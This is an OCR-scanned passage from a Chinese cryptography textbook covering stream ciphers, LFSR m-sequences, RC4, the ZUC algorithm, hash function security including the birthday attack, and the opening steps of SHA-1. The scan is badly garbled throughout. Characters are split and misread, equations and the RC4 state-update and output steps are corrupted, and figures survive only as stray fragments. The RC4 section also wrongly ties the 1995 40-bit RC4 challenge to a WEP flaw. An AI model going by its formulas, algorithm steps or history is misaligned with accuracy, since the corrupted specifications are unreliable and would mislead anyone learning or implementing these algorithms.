序列 产生 算法 应 能 产生 随机 性 和 不 可 预测 性 好 的 密 钥 序列 。 目 前 已 有 许多 产生 优质 密 钥 
序列 的 算法 。 保 持 通 信 双 方 的 精确 同步 是 序列 密码 实际 应 用 中 的 关键 技术 。 由 于 通信 双 
方 必须 能 够 产生 相同 的 密 钥 序列 ， 所 以 这 种 密 钥 序列 不 可 能 是 真 随机 序列 ， 只 能 是 伪 随 


机 序列 ， 只 不 过 是 具有 良好 随机 性 和 不 可 预测 性 的 伪 随 机 序列 。 
| 种 子 密 钥 
密 钥 序 列 
产生 算法 
密 钥 序列 
明文 ( 密 文 ) 序列 密 文 (明文) 序列 


图 2-20 序列 密码 原理 


为 了 产生 出 随机 性 好 而 且 周 期 足够 长 的 密 钥 序 列 ， 密 钥 序列 产生 算法 都 采用 带 存 储 
的 时 序 算法 ， 其 理论 模型 为 有 限 自动 机 ， 其 实现 电路 为 时 序 电路 。 


2.3.2 ”线性 移 位 寄存 器 序列 


23.21 ” 移 位 宥 存 器 

移 位 寄存 器 是 大 家 熟悉 的 概念 。 图 2-21 给 出 了 移 位 寄存 器 的 结构 。 其 中 so so es 
sn-1 组 成 左 移 移 位 寄存 器 ， 并 称 每 一 时 刻 移 位 寄存 器 的 具体 取 值 为 其 一 个 状态 。 移 位 寄存 
器 的 输出 要 通过 函数 f(s0,s1…,sn1) 计 算 产 生 ， 并 同时 要 送 入 sn1。 称 函数 flsoss1,…,sn-1 ) 
为 移 位 寄存 器 的 反馈 函数 。 如 果 反 馈 函 数 flso,s1 ,°°,Sn-1 ) 是 S081 ，”“ :31-1 的 线性 函数 ， 则 称 
移 位 寄存 器 为 线性 移 位 寄存 器 (LSR)， 否 则 称 为 非 线性 移 位 寄存 器 。 


f(s0s1 sm) 输出 
| 
ws } -一 --- 一 ss 


图 2-21 移 位 寄存 器 


he 


pa. 
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2.3.2.2 ”反馈 函数 
设 flso,s1,…,sn1) 为 线性 函数 ， 则 Ksoss1,…,sn_1) 可 写成 
Mso0ss1,°°°,sn_ 1)-gosotg1s1t,**,+gn 1Sn 1 (2-34) 
HEP, gogi gni 为 反馈 系数 。 在 二 进 制 的 情况 下 ， 式 (2-34) 中 的 + 即 为 模 2 加 
@ ， 此 时 线性 移 位 寄存 器 的 结构 如 图 2-22 所 示 。 其 中 反馈 系数 gE GF(2)， 如 果 g0 
则 表示 式 (2-34) 中 的 gs: 项 不 存在 ， 因 此 表示 si 不 连接 。 同 理 ，g 志 1 表示 si 连接 。 故 
血 的 作用 相当 于 一 个 开关 。 
形式 地 ， 用 x 与 s; 相对 应 ， 则 根据 式 (2-34) 的 反馈 函数 可 导出 一 个 x 的 多 项 式 : 
2(X)= gnx "tonix +, +giX +go (2-35) 
并 称 g(x) 为 线性 移 位 寄存 器 的 连接 多 项 式 。 与 图 2-22 对 照 可 知 ，gw=go =l. WW, 
若 gw=0 则 输出 不 反馈 到 Sua E g1=0 则 so 不 起 作用 ， 应 将 其 去 掉 。 


-Ð T -Ð -i 
1 1 

£o 8 2 g ri En 
So ja- Sı ~ 天 a Sp 


图 2-22 GF(2 ) 上 的 线性 移 位 寄存 器 


线性 移 位 寄存 器 的 输出 序列 的 性 质 完全 由 反馈 函数 所 决定 ， 也 即 完全 由 连接 多 项 式 
所 决定 ， 有 了 连接 多 项 式 的 概念 便 可 利用 数学 工具 深入 研究 线性 移 位 寄存 器 的 输出 序列 
的 性 质 。 目 前 ， 线 性 移 位 寄存 器 的 输出 序列 的 理论 已 经 十 分 成 熟 。n 级 线性 移 位 寄存 器 
最 多 有 2" 个 不 同 的 状态 。 若 其 初始 状态 为 零 ， 则 其 后 续 状 态 恒 为 零 。 若 其 初始 状态 不 为 
零 ， 则 其 后 续 状 态 也 不 为 零 。 因 此 ，n 级 线性 移 位 寄存 器 的 状态 周期 <2-1， 其 输出 序列 
的 周期 <2"-1。 只 要 选择 合适 的 连接 多 项 式 便 可 使 线性 移 位 寄存 器 的 输出 序列 周期 达到 最 
大 值 2-1， 并 称 此 时 的 输出 序列 为 最 大 长 度 线 性 移 位 寄存 器 输出 序列 ， 简 称 为 m 序列 。 

我 们 把 序列 中 连续 的 i 个 1 称 为 长 度 等 于 i 的 1 游程 , 把 序列 中 连续 的 i 个 0 称 为 长 
度 等 于 i 的 0 游程 。 可 以 发 现 m 序列 具有 如 下 的 良好 随机 性 : 

(1) 在 一 个 周期 内 ，0 和 1 出 现 的 次 数 接近 相等 ， 即 0 出 现 的 次 数 为 2 "1, 1 出 现 
的 次 数 为 2; 

(2) 在 一 个 周期 内 ， 游 程 总 数 为 2 了 ， 其 中 长 度 为 i (1<i<n-2) 的 1 游程 和 0 游程 
的 数目 各 有 2” 个 ， 长 度 为 n-1 的 0 游程 1 KA n 的 1 游程 有 1 个 。 

(3) 自 相 关 函 数 


C(x) als 2-36) 
T, Pi 
-1/2"-1), 0<r<2"-2 ' 
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由 于 m 序列 具有 良好 的 随机 性 ， 它 不 仅 在 密码 方面 ， 而 且 在 通信 、 雷 达 等 方面 都 得 
到 广泛 应 用 。 

可 以 证 明 ， 仅 当 连 接 多 项 式 g(x) 为 本 原 多 项 式 时 ， 其 线性 移 位 寄存 器 的 输出 序列 为 
m 序列 。 设 ftx) 为 GF (2) 上 的 多 项 式 ， 使 Kopz-1 的 最 小 正 整数 p 称 为 x) 的 周期 。 如 
果 fx) 的 次 数 为 x， 且 其 周期 为 2 一 1， 则 称 .fx) 为 本 原 多 项 式 。 己 经 证 明 ， 对 于 任意 的 正 
整数 n， 至 少 存在 一 个 n 次 本 原 多 项 式 。 这 表明 ， 对 于 任意 的 n 级 线性 移 位 寄存 器 ， 至 
少 有 一 种 连接 方式 使 其 输出 序列 为 m 序列 。 

例 2-1 设 g(xW)=x*+tx+1，g(w) 为 本 原 多 项 式 ， 以 其 为 连接 多 项 式 的 线性 移 位 寄存 器 如 
图 2-23 所 示 ， 其 输出 序列 为 100110101111000…， 它 是 周期 为 2_1=15 的 m 序列 。 


4 
p N 


图 2-23 “连接 多 项 式 为 gC9=ttetl 的 线性 移 位 寄存 器 


虽然 线性 移 位 寄存 器 序列 具有 良好 的 随机 性 ， 然 而 线性 移 位 寄存 器 序列 密码 却 是 可 
破译 的 。 一 般 ， 对 于 n=1000 的 线性 移 位 寄存 器 序列 密码 ， 用 每 秒 100 万 次 的 计算 机 ， 
一 天 之 内 便 可 破译 。 


2.3.3 ”RC4 序列 密码 


RC4 序列 密码 是 美国 RSA 数据 安全 公司 设计 的 一 种 序列 密码 。RSA 数据 安全 公司 
将 其 收集 在 加 密 工具 软件 BSAFE 中 。 最 初 并 没有 公布 RC4 的 算法 ， 但 由 于 在 很 多 安全 
软件 系统 中 使 用 了 这 个 密码 ， 人 们 通过 对 软件 进行 逆向 分 析 得 到 了 算法 。 在 这 种 情况 下 
RSA 数据 安全 公司 于 1997 年 公布 了 RC4 密码 算法 。 
2.3.3.1 RC4 参数 

RC4 密码 与 基于 移 位 寄存 器 的 序列 密码 不 同 ， 它 是 一 种 基于 非 线性 数据 表 变换 的 序 
列 密码 。 它 以 一 个 足够 大 的 数据 表 为 基础 ， 对 表 进行 非 线 性 变换 ， 产 生 非 线性 的 密 铀 
序列 。 

RC4 算法 取 n=8， 使 用 2"=2°=256 个 字 节 构成 的 S 表 和 两 个 字 节 (n=8 位 ) 指针 (7 
HAD, ARER 258 字 节 的 存储 空间 。S 表 的 值 So,S1…，Szss 是 0.1…，255 的 一 个 排 
列 。 IT 和 J 了 的 初 值 为 0。 其 中 表 值 和 指针 值 的 算术 运算 按 模 2"=2°=256 进行 。 
2.3.3.2 RC4 算法 

我 们 可 以 把 RC4 算法 看 成 一 个 有 限 状态 自动 机 。 把 S$ RAL 指针 的 具体 取 值 称 
为 RC4 的 一 个 状态 : 


= 输出 


T=< So Si, ***, Sss J>, 


ie 


Bick 
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对 状态 了 进行 非 线 性 变换 ， 产 生出 新 的 状态 ， 并 输出 密 钥 序 列 中 一 个 字 节 k 。 

RC4 的 下 一 状态 函数 定义 如 下 : 

(1) 0, J=0; 

(2) FH1 mod 256; 

(3) J=J+S; mod 256; 

(4) 交换 Sr 和 Sy。 

RC4 的 输出 函数 定义 如 下 : 

(1) h=S;+S; mod 256; 

(2) 有 So。 

以 大 为 密 钥 字 符 ，RC4 有 限 状 态 自 动机 不 停 运转 ， 便 源源 不 断 的 产生 出 密 钥 字 符 序 
列 。 加 密 时 ， 将 密 钥 字 符 与 明文 字符 模 2 相 加 便 完成 了 加 密 。 解 密 时 ， 将 密 钥 字 符 
与 密 文 字符 模 2 相 加 便 完成 了 解密 。 

在 用 RC4 加 解密 之 前 ， 应 当 首 先 对 5S 表 初 始 化 。 对 S 表 初始 化 的 过 程 如 下 : 

(1) 对 5S 表 进行 线性 填充 ， 即 令 

So=0，S1=]，S2=2,，*…，S2ss=255; 

(2) 用 密 钥 填充 另 一 个 256 字 节 的 R 表 Ro,R1…，Rzss， 如 果 密 钥 的 长 度 小 于 RR 表 
的 长 度 ， 则 依次 重复 填充 ， 直 至 将 R 表 填 满 。 

(3) J=0; 

(4) 对 于 大 0 到 255 重复 以 下 操作 : 

© J (SHR) mod 256; 

@ 交换 Sr 和 Sy。 

注意 : 对 S 表 初 始 化 的 过 程 实质 上 是 对 S 表 进 行 随 机 化 处 理 的 过 程 。 只 有 当 这 一 过 
程 完成 后 ， 才 能 计算 产生 密 钥 字符 ， 才 能 进行 加 解密 ， 和 否则 将 是 不 安全 的 。 
2.3.3.3 RC4 安全 性 

由 密 钥 字 符 k 的 产生 算法 可 以 看 出 , 对 于 RC4 有 限 状态 自动 机 的 每 一 个 状态 , 产生 
出 一 个 密 钥 字符 。RC4 有 限 状态 自动 机 的 一 个 状态 是 S 表 的 一 个 排列 ， 由 于 S 表 有 256 
个 字 节 元 素 ， 可 能 的 排列 共有 256! ~2“”，”， 因 此 穷 举 攻击 是 不 可 能 的 。 

RC4 算法 的 优点 是 算法 简单 ， 高 效 ， 特 别 适 合 软件 实现 。 

对 于 RC4 算法 软件 的 出 口 ,美国 政府 作 了 明确 的 限制 ， 其 密 钥 长 度 不 能 超过 40 位 。 
1995 年 有 人 在 Intemet 网 上 公布 了 一 条 用 40 位 密 钥 的 RC4 加 密 的 密 文 ， 并 提出 了 破译 
挑战 。 法 国 的 一 个 研究 小 组 通过 Internet 网 ， 用 了 120 台 计 算 机 和 工作 站 ， 结 果 只 用 了 8 
天 时 间 便 求 出 了 密 钥 。 在 此 之 后 ， 又 提出 第 二 次 破译 挑战 ， 结 果 只 用 了 31.8 小 时 便 破译 
成 功 。 问 题 并 不 出 在 RC4 本 身 。 这 些 攻 击 是 利用 了 WEP 协议 的 密 钥 产 生 途 径 中 的 一 个 
漏洞 。 因 此 这 种 攻击 不 适用 于 攻击 RC4 的 其 他 应 用 。 这 个 问题 说 明了 设计 一 个 安全 系统 
的 困难 性 不 仅 在 于 密码 算法 本 身 ， 而 且 还 包括 协议 ， 以 及 如 何 正 确 地 使 用 密码 算法 。 
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由 于 RC4 密码 算法 简单 ， 软 件 实现 容易 ， 加 密 速度 快 ， 得 到 了 广泛 的 应 用 。 目 前 ， 
RC4 密码 可 能 是 商用 领域 应 用 最 广 的 序列 密码 。 如 ，Windows、Lotus Notes 等 软件 系统 
都 采用 了 RC4 算法 ， SSL/TLS( 安 全 套 接 字 层 协 议 / 传 输 层 安全 协议 ) 和 WEP 协议 (Wired 
Equivalent Privacy) 也 都 应 用 了 RC4 密码 。 


2.3.4 ZUC 算法 


ZUC 算法 , 即 祖冲之 算法 , 是 移动 通信 3GPP 机 密 性 算法 EEA3 和 完整 性 算法 EIA3 
的 核心 ， 是 中 国 自主 设计 的 加 密 算法 。2009 年 5 月 ZUC 算法 获得 3GPP 安全 算法 组 SA 
立项 ， 正 式 申请 参加 3GPP LTE 第 三 套 机 密 性 和 完整 性 算法 标准 的 竞选 工作 。 历 时 两 年 
多 的 时 间 ，ZUC 算法 经 过 包括 3GPP SAGE 内 部 评估 ， 两 个 邀请 付费 的 学 术 团 体 的 外 部 
评估 以 及 公开 评估 等 在 内 的 3 个 阶段 的 安全 评估 工作 后 ,于 2011 年 9 月 正式 被 3GPP SA 
全 会 通过 ， 成 为 3GPP LTE 第 三 套 加 密 标准 核心 算法 。ZUC 算法 是 中 国 第 一 个 成 为 国际 
密码 标准 的 密码 算法 。 其 标准 化 的 成 功 ， 是 中 国 在 商用 密码 算法 领域 取得 的 一 次 重大 突 
破 ， 体 现 了 中 国 商用 密码 应 用 的 开放 性 和 商用 密码 设计 的 高 能 力 ， 其 必 将 增 大 中 国 在 国 
际 通信 安全 应 用 领域 的 影响 力 ， 且 今后 无 论 是 对 中 国 在 国际 商用 密码 标准 化 方面 的 工作 
还 是 商用 密码 的 密码 设计 来 说 都 有 深远 的 影响 。 

ZUC 是 一 个 同步 流 密码 算法 , 其 以 中 国 古 代 著名 数学 家 祖冲之 的 拼音 (ZU Chongzhi) 
首 字母 命名 ， 中 文 称 作 祖冲之 算法 。 该 算法 在 设计 之 初 就 面临 着 高 的 挑战 。 美 国 高 级 加 
密 标 准 AES 和 欧洲 SNOW 3G 已 经 被 选 为 LTE 加 密 标 准 ， 它 们 是 两 个 设计 非常 优秀 的 
密码 算法 , 具有 非常 高 的 安全 强度 。ZUC 算法 的 设计 必须 做 到 不 能 比 AES 或 SNOW 3G 
差 ， 才 有 可 能 在 3GPPLTE 有 立 脚 之 处 。 面 对 挑战 ，ZUC 算法 的 设计 必须 具有 高 安全 、 
高 效率 以 及 新 颖 性 等 特点 。 其 中 高 安全 和 高 效率 要 求 设 计 的 新 算法 在 安全 和 效率 上 不 能 
比 AES 或 SNOW 3G 低 ， 而 新 颖 性 要 求 设 计 的 密码 算法 在 结构 和 部 件 上 都 有 创新 。 然 而 
密码 算法 设计 发 展 到 今天 ， 许 多 经 典 结构 和 部 件 的 设计 都 基本 定型 ， 要 同时 达到 上 述 目 
标 ， 无 疑 是 一 项 非常 艰巨 的 任务 。 

ZUC 算法 在 逻辑 上 采用 三 层 结构 设计 ,如 图 2-24 所 示 。 上 层 为 定义 在 素 域 GF(2”1-1) 
上 的 线性 反馈 移 位 寄存 器 (LFSR)， 这 是 ZUC 算法 设计 的 一 大 创新 。 目 前 常见 流 密码 体 
制 的 LFSR 均 采 用 二 元 域 或 二 元 域 的 某 个 扩 域 上 的 m 序列 。 这 种 序列 具有 明显 的 多 重 线 
性 关系 ， 这 使 得 以 其 为 序列 源 的 密码 算法 容易 受到 相关 攻击 。ZUC 算法 的 LFSR 设计 首 
次 采用 素 域 GF -DH m 序 列 。 该 类 序列 周期 长 、 统 计 特性 好 ， 且 在 特征 为 2 的 有 限 
域 上 是 非 线性 的 ， 其 具有 线性 结构 弱 、 比 特 关系 符合 率 低 等 优点 。 因 而 采用 GF) 
上 的 LFSR 设计 的 ZUC 算法 具有 天 然 的 强 抵抗 二 元 域 上 密码 攻击 方法 的 能 力 , 譬如 二 元 
域 上 的 代数 攻击 、 区 分 分 析 和 相关 攻击 等 。 此 外 ， 由 于 素 域 GFC2-1) 上 的 乘法 可 以 快速 
实现 ，ZUC 算法 LFSR 在 设计 时 充分 考虑 到 安全 和 效率 两 方面 的 问题 ， 在 达到 高 安全 目 
标的 同时 可 以 非常 高 效 地 软 硬 件 实现 。 
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图 2-24 ZUC 算法 整体 结构 


ZUC 算法 中 间 层 为 比特 重组 。 比 特 重 组 采用 取 半 合并 技术 ， 实 现 LFSR 数据 单元 到 
非 线 性 函数 F 和 密 钥 输出 的 数据 转换 , 其 主要 目的 是 破坏 LFSR 在 素 域 GF(2”-1) 上 的 线 
性 结构 。 结 合 下 层 的 非 线性 函数 FE， 比特 重组 可 使 得 一 些 在 素 域 GF(2”-1) 上 的 密码 攻击 
方法 变 得 非常 困难 。 

ZUC 算法 下 层 为 非 线性 函数 F. 在 非 线 性 函数 的 设计 上 , ZUC 算法 设计 充分 借鉴 
了 分 组 密码 的 设计 技巧 ， 采 用 S 盒 和 高 扩散 特性 的 线性 变换 工 ， 非 线性 函数 五 具有 高 的 
抵抗 区 分 分 析 、 快 速 相关 攻击 和 猜测 确定 攻击 等 方法 的 能 力 。 此 外 ， 非 线性 函数 的 5 
盒 采 用 结构 化 设计 方法 ， 在 具有 好 的 密码 学 性 质 的 同时 降低 了 硬件 实现 代价 ， 具 有 实现 
面积 小 、 功 耗 低 等 特点 。 

经 过 上 述 三 层 结构 的 综合 运用 ,ZUC 算法 具有 非常 高 的 安全 强度 ， 能 够 抵抗 目前 常 
见 的 各 种 流 密 码 攻 击 方法 。 其 设计 已 得 到 国内 外 著名 密码 学 家 的 认可 ， 他 们 对 其 安全 强 
度 给 予 了 很 高 的 评价 。 

上 面 介绍 的 ZUC 算法 本 质 上 是 一 种 非 线 性 序列 产生 器 。 由 此 ， 在 种 子 密 钥 的 作用 
下 ， 可 以 产生 足够 长 的 安全 密 钥 序 列 。 把 与 密 钥 序列 明文 数据 模 2 相 加 ， 便 完成 了 数据 
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加 密 。 同 样 ， 把 密 钥 序列 与 密 文 数据 模 2 相 加 ， 便 完成 了 数据 解密 。 
2.4 Hash 函数 


2.4.1 Hash 函数 的 概念 


Hash 函数 将 任意 长 的 报 文 M 映射 为 定 长 的 hash Fh, HBA: 
h=H(M) (2-37) 

hash 码 也 称 报 文摘 要 ， 它 是 所 有 报 文 位 的 函数 。 它 具有 错误 检测 能 力 ， 即 改变 报 文 
的 任何 一 位 或 多 位 ， 都 会 导致 hash 码 的 改变 。 

在 实现 认证 过 程 中 发 送 方 将 hash 码 附 于 要 发 送 的 报 文 之 后 发 送 给 接收 方 , 接收 方 通 
过 重新 计算 hash 码 来 认证 报 文 。Hash 函数 可 提供 保密 性 、 报 文 认证 以 及 数字 签名 功能 。 
2.4.1.1 单 向 函数 

Hash 函数 的 目的 就 是 要 产生 文件 、 报 文 或 其 他 数据 块 的 “指纹 ”。Hash 函数 要 能 够 
用 于 报 文 认证 ， 它 必须 可 应 用 于 任意 大 小 的 数据 块 并 产生 定 长 的 输出 ; 对 任何 给 定 的 x， 
用 硬件 和 软件 均 比 较 容 易 实 现 。 除 此 以 外 ，Hash 函数 还 应 满足 下 列 性 质 ; 

。 单 向 性 :对 任何 给 定 的 hash Ki h, IRENE H(x)=h 的 x 在 计算 上 是 不 可 行 

的 。 
。 抗 弱 碰 撞 性 : 对 任何 给 定 的 分 组 x， 找 到 满足 zx H. HEHH y 在 计算 上 是 不 
可 行 的 。 

。 抗 强 碰撞 性 ;找到 任何 满足 有 so)=Eo) 的 偶 对 Go) 在 计算 上 是 不 可 行 的 。 

1. 单 向 性 

单 向 性 是 指 ， 由 Hash 码 不 能 得 出 相应 的 报 文 。 在 上 述 讨论 中 ， 虽 然 秘密 值 8 本 身 
并 不 传送 ， 但 若 Hash 函数 不 是 单 向 的 ， 则 攻击 者 可 以 获得 该 秘密 值 。 攻 击 者 可 以 截获 
传送 的 报 文 M 和 Hash 函数 值 C=FKMIIS), 然 后 求 出 Hash 函数 的 逆 , 从 而 得 出 MIIS=H (C), 
然后 从 M 和 MIIS 即 可 得 出 S。 

对 于 输出 摘要 值 为 n 位 的 hash 函数 ， 假 设 该 hash 函数 的 输出 值 是 均匀 分 布 的 ， 那 
么 任意 输入 消息 x 产生 的 hash 函数 值 Hx) 恰 好 为 h 的 概率 是 1/2"。 因 此 穷 举 攻击 对 于 单 
向 性 求解 的 时 间 复 杂 度 为 0(2”)。 

2. 抗 弱 碰 撞 性 

抗 弱 磁 撞 性 保证 ， 不 能 找到 与 给 定 报 文具 有 相同 Hash 值 的 另 一 报 文 ， 因 此 通过 对 
Hash 函数 值 加 密 来 防止 伪造 。 如 果 该 性 质 不 成 立 ， 那 么 攻击 者 可 以 截获 一 条 报 文 M 及 
其 加 密 的 Hash PA ŽU EHM), K); HIX M E HM), RJE RIR ME HMHM), 
这 样 攻击 者 可 用 Mr 去 取代 M。 

从 穷 举 分 析 的 角度 求解 弱 碰 撞 问题 的 难度 等 价 于 求解 单 向 性 的 难度 ， 穷 举 攻击 对 于 


EQ 


EJ 
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弱 碰 撞 问 题 求解 的 时 间 复 杂 度 为 0(2”)。 

3. 抗 强 碰 撞 性 

抗 强 碰 撞 性 涉及 Hash 函数 抗 生 日 攻击 这 类 攻击 的 能 力 强 弱 问 题 。 

所 谓 的 生日 问题 是 密码 学 领域 经 常 涉及 的 一 个 基本 问题 。 这 里 我 们 讨论 生日 问题 是 
因为 它 对 于 理解 hash 函数 的 安全 性 而 言 十 分 重要 。 

假设 及 个 人 在 一 个 屋子 中 。 现在 我 们 回答 这 样 的 问题 ， 如果 任何 两 个 或 两 个 以 上 
人 的 生日 相同 的 概率 超过 1/2 的 话 ， 需 要 N 为 多 大 ? 

将 屋子 中 的 W 个 人 编号 为 0，1，2，…，N-1。 给 定 第 0 个 人 的 生日 。 如 果 所 有 的 
人 生日 都 不 相同 ， 那 么 第 1 个 人 的 生日 必须 与 第 0 个 人 的 生日 不 同 ， 即 第 1 个 人 的 生日 
只 能 从 剩余 的 364 天 中 选取 。 类 似 地 ， 第 2 个 人 的 生日 只 能 从 剩余 的 363 天 中 选取 ， 以 
此 类 推 。 假 设 所 有 生日 日 期 的 可 能 都 相等 ， 则 概率 是 : 

1- (365/365) - (364/365) - (363/365)---((365 — N +1)/365) 

令 上 式 等 于 1/2， 求 解 W， 我 们 得 出 W = 23 。 这 通常 称 为 生日 悖 论 。 乍 一 看 这 个 结 
果 很 荒 雇 ,在 一 个 屋子 里 只 需要 23 个 人 就 可 以 找到 两 个 或 两 个 以 上 相同 生日 的 人 。 仔细 
考虑 后 这 个 结果 是 正确 的 。 因 为 在 该 问题 中 ， 我 们 对 每 两 个 人 都 比较 了 生日 。 对 于 屋子 
里 面 的 YY 个人, 共 比 较 了 N(N -1)/22 N? 次。 因为 这 里 只 有 365 种 可 能 的 生日 日 期 ,所 
以 找到 一 对 相同 生日 的 临界 点 就 是 N? =365，, 或 者 N=V365 <19 。 这 样 看 来 生日 悖 论 也 
并 非 不 合理 。 因 此 对 于 生日 攻击 来 说 平均 需要 尝试 超过 2”: 个 消息 就 能 产生 一 个 碰撞 。 

例如 : 

A) 发 送 方 对 报 文 “签名” BI MIIECUM)，Kaa), 其 中 HNA m 位 。 

(2) 攻击 者 产生 报 文 M 的 2” 种 变 式 ， 且 每 一 种 变 式 表达 相同 的 意义 。 然 后 攻击 者 
再 伪造 一 条 报 文 M1， 并 产生 Mi 的 2” 种 变 式 。 

G) 比较 上 述 两 个 集合 ， 找 出 产生 相同 Hash 函数 值 的 一 对 报 文 M 和 M'e WIE 
HER, 找到 这 对 报 文 的 概率 大 于 0.5， 如 果 找 不 到 这 样 的 报 文 ， 那么 再 产生 一 条 伪造 的 
报 文 直至 成 功 为 止 。 

(4) 攻击 者 将 MM 提供 给 A 签名 ， 将 该 签名 附 于 Mi' 后 ， 发 送 给 意 定 的 接收 方 。 因 为 
M 和 M1' 的 Hash 函数 值 相同 ， 所 以 对 它们 产生 的 签名 也 相同 ， 因 此 攻击 者 即使 不 知道 加 
密 密 钥 也 能 攻击 成 功 。 

如 果 使 用 的 Hash 函数 值 为 64 位 ， 那 么 所 需 代价 仅 为 2°. 

由 此 可 见 ，Hash 函数 值 应 该 较 长 。 例 如 NIST 在 2002 年 发 布 的 SHA-2 算法 的 Hash 
码 长 度 为 是 256 位 ，384 位 和 512 位 ， 其 目的 就 是 要 分 别 和 128 位 ，192 位 ，256 位 AES 
算法 的 强度 相 匹配 。 

2.4.1.2 Hash 函数 的 基本 设计 结构 

Merkle 提出 了 安全 Hash 函数 一 般 结构 如 图 2-25 所 示 ， 它 是 一 种 迭代 结构 。 目 前 所 
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使 用 的 大 多 数 Hash 函数 (包括 MDx 系列 ，SHA 系列 ) 均 具 有 这 种 结构 。 它 将 输入 报 文 
分 为 L-1 个 大 小 为 b 位 的 分 组 。 若 第 工 -1 个 分 组 不 足 b 位 ， 则 将 其 填充 为 b 位 。 然 后 再 
附加 上 一 个 表示 输入 的 总 长 度 分 组 。 由 于 输入 中 包含 长 度 ， 所 以 攻击 者 必须 找 出 具有 相 
同 Hash 值 且 长 度 相等 的 两 条 报 文 , 或 者 找 出 两 条 长 度 不 等 但 加 入 报 文 长 度 后 Hash 值 相 
同 的 报 文 ， 从 而 增加 了 攻击 的 难度 。 

Hash 函数 可 归纳 如 下 : 


CV = IV = n 位 初始 值 
CVi=ACVi Mi) l<i<L 
H(M) = CV, 
其 中 ，Hash 函数 的 输入 为 报 文 M， 它 由 分 组 Mo, Mi, Ma, s Mri ARo KÉS 
的 输入 是 前 一 步 中 得 出 的 n 位 结果 ( 称 为 链接 变量 ) 和 一 个 5 位 分 组 ， 输 出 为 一 个 位 
分 组 。 通 常 b>n， 所 以 了 称 为 压缩 函数 。 


Mo Mi 
val ce 
n fil 


n 位 
IV=CVo 


Mi~ 


IV= 初始 值 

CV = 链接 变量 

M= 第 i 个 输入 分 组 
了 = 压缩 函数 
工 = 输入 分 组 数 
n=hash 码 的 长 度 
b= 输入 分 组 的 长 度 


2-25 ”安全 Hash 码 的 一 般 结 构 


Hash 函数 建立 在 压缩 函数 的 基础 上 。 许 多 研究 者 认为 ， 如 果 压 缩 函 数 具 有 抗 碰撞 能 
力 ， 那 么 迭代 Hash 函数 也 具有 抗 碰撞 能 力 (其 道 不 一 定 为 真 )。 因 此 ， 设 计 安 全 Hash K 
数 中 ， 重 要 的 是 要 设计 具有 抗 碰撞 能 力 的 压缩 函数 ， 并 且 该 压缩 函数 的 输入 是 定 长 的 。 


2.4.2 SHA 算法 


安全 Hash 算法 (SHA) 是 由 美国 标准 与 技术 研究 所 (NIST) 设 计 并 于 1993 年 公布 (FIPS 
PUB 180), 1995 年 又 公布 了 FIPS PUB 180-1， 通 常 称 之 为 SHA-1。 其 输入 为 长 度 小 于 
2 位 的 报 文 ， 输出 为 160 位 的 报 文摘 要 ， 该 算法 对 输入 按 512 位 进行 分 组 ， 并 以 分 组 为 


iE 
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单位 进行 处 理 。 

SHA-1 算法 步骤 

步骤 1: 填充 报 文 .填充 报 文 的 目的 是 使 报 文 长 度 与 448 模 512 同 余 ( 即 长 度 =448 mod 
512)。 若 报 文本 身 己 经 满足 上 述 长 度 要 求 , 仍然 需要 进行 填充 (例如 ,车 报 文 长 度 为 448 
位 ， 则 仍 需 要 填充 512 位 使 其 长 度 为 960 位 )， 因 此 填充 位 数 在 1 到 512 之 间 。 填充 方法 
是 在 报 文 后 附加 一 个 1 和 若干 个 0。 然 后 附 上 表示 填充 前 报 文 长 度 的 64 位 数据 (最 高 有 

步骤 2: 初始 化 缓冲 区 。hash 函数 的 中 间 结 果 和 最 终结 果 保存 于 160 位 的 缓冲 区 中 ， 
缓冲 区 由 5 个 32 位 的 寄存 器 (A，B，C，D，E) 组 成 ， 将 这 些 寄存 器 初始 化 为 下 列 32 位 
的 整数 (十 六 进 制 值 ): 

A: 67452301 
: EFCDAB89 
: 98BADCFE 
: 10325476 
: C3D2E1FO 

dep, A, B, C 和 DD 的 值 与 MD5 中 使 用 的 值 相同 ， 但 其 存储 方式 与 MD5 中 不 同 。 
在 SHA-1 中 ， 字 的 最 高 有 效 字 节 存 于 低地 址 字 节 位 置 ， 即 如 下 存储 (十 六 进 制 ): 

A=67452301 

B = EF CD AB 89 

C =98 BA DC FE 

D=1032 5476 

E = C3 D2 El FO 

步 又 3: 执行 算法 主 循 环 。 每 次 循环 处 理 一 个 512 位 的 分 组 ， 故 循环 次 数 为 填充 后 
报 文 的 分 组 数 ， 见 图 2-26， 其 中 HSHA-1 为 压缩 函数 模块 。 


一 -512 位 -一 一 一 512 位 一 一 一 一 512 位 一 一 


M | M, Mai 


uow 


512 位 


160 位 
we 


(160 位 的 摘要 》 


图 2-26 利用 SHA-1 算法 产生 报 文摘 要 
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算法 的 核心 是 压缩 函数 ， 见 图 2-27。 它 由 四 轮 运算 组 成 ， 四 轮 运算 结构 相同 。 每 轮 
的 输入 是 当前 要 处 理 的 512 位 的 分 组 (Ma) 和 160 位 缓冲 区 ABCDE 的 内 容 ， 每 轮 使 用 的 
逻辑 函数 不 同 , 分 别 为 ,和 有 及， 其 处 理 过 程 如 图 2-27 所 示 。 第 四 轮 的 输出 与 第 一 轮 


的 输入 相 加 得 到 压缩 函数 的 输出 。 


M, c, 


160 位 
512 位 


A B C 


D 


第 一 轮 
使 用 逻辑 函数 人 


E 


CVa 


图 2-27 SHA-1 压缩 函数 


步骤 4: 输出 。 所 有 的 工 个 512 位 的 分 组 处 理 完 后 ， 第 工 个 分 组 的 输出 即 是 160 位 


的 报 文摘 要 。 
SHA-1 的 处 理 过 程 可 归纳 如 下 : 
[@) 
CVin(0)=CV(0)+ Aq O<q<L-1 


CV pi I=CV(1)+ Bg 
CV q1(2)=CV9(2)+ Cq 


Pa 项 


iw 
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CVan(3)-CV(3)+ Dg 
CVan(4)=CVa( D+ Eq 
MD=CV, 


其 中 IV= 缓 冲 区 ABCDE 的 初 值 。 


Aq, Bq, Cq, Dq, Eq = 处 理 第 q 个 报 文 分 组 时 最 后 一 轮 的 输出 : 

+= 模 2” 加 法 

万- 报 文中 分 组 的 个 数 (包括 填充 位 和 长 度 域 ) 

CVg= 第 q 个 链接 变量 

MD= 报 文摘 要 

下 面 我 们 详细 讨论 每 轮 处 理 512 位 分 组 的 过 程 。SHA-1 中 每 轮 要 对 缓冲 区 ABCDE 


进行 20 步 迭 代 。 因 此 压缩 函数 共有 80 步 。 每 步 迭 代 如 图 2-28 tas. 


图 2-28 SHA 的 基本 操作 ( 单 步 ) 


也 就 是 说 ， 每 步 具有 下 述 形式 : 
A,B,C,D,E¢(E+f,(B,C.D)(A<<<5)+W +K ;),A,(B<<<30),C,D 


其 中 
